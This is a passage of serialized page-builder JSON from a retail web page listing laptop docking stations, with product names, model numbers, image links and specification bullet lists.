center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock 